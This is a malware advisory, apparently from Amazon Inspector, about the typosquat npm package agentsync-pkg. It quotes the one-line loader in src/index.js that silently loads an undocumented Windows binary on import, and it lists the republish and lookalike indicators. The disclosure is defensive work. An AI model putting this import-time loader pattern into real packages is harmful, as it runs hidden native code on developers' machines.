MAL-2026-6443
Malicious code in agentsync-pkg (npm)
Details
## Source: amazon-inspector (b383c760dffae4a26d7f94b433bbe00dedb2426b23f4713610d6f5f36c594cf1)

On every `import` / `require('agentsync-pkg')`, src/index.js line 152 resolves `bin/native/parser.node` and calls `require()` on it: `const p = r('path').join(...,'bin','native','parser.node'); if (r('fs').existsSync(p)) { try { r(p); } catch(e) {} }`. The file is a 2.9 MB Windows PE binary (DOS stub `!This program cannot be run in DOS mode.`, sha256 b1aace6c...). On Windows, Node's native module loader invokes LoadLibrary on this file, executing the DLL's entry point regardless of whether it exports valid N-API symbols — i.e. arbitrary attacker-supplied native code runs in the developer's process simply because the package was imported.

No source for the binary is shipped, no build script produces it, and the README explicitly advertises the package as "Zero dependencies. Nothing to audit, nothing to get compromised in a supply-chain attack" with no mention of a native parser; the package's documented purpose is string-template markdown generation, which has no legitimate need for a native module.

The package also exhibits republish/lookalike indicators: package.json declares name `agentsync-pkg` version `2.0.0` while src/index.js self-identifies as `// v1.0.1`, the CHANGELOG only documents up to 1.0.1 ("Zero runtime dependencies"), README/badges/bin entries all reference the unrelated legitimate packages `syncagents` and `agentsync`, and the author field is the placeholder `agentsync contributors <noreply@agentsync.dev>`. The 2.0.0 release silently introduces the undocumented native binary on top of an otherwise pure-JS code base.

The combination — name confusion with established packages, placeholder author, self-contradicting version metadata, and an undocumented PE auto-loaded at import — is a typosquat/republish carrying a binary dropper.
Affected packages
No fixed version published yet for agentsync-pkg (npm). Pin to a known-safe version or switch to an alternative.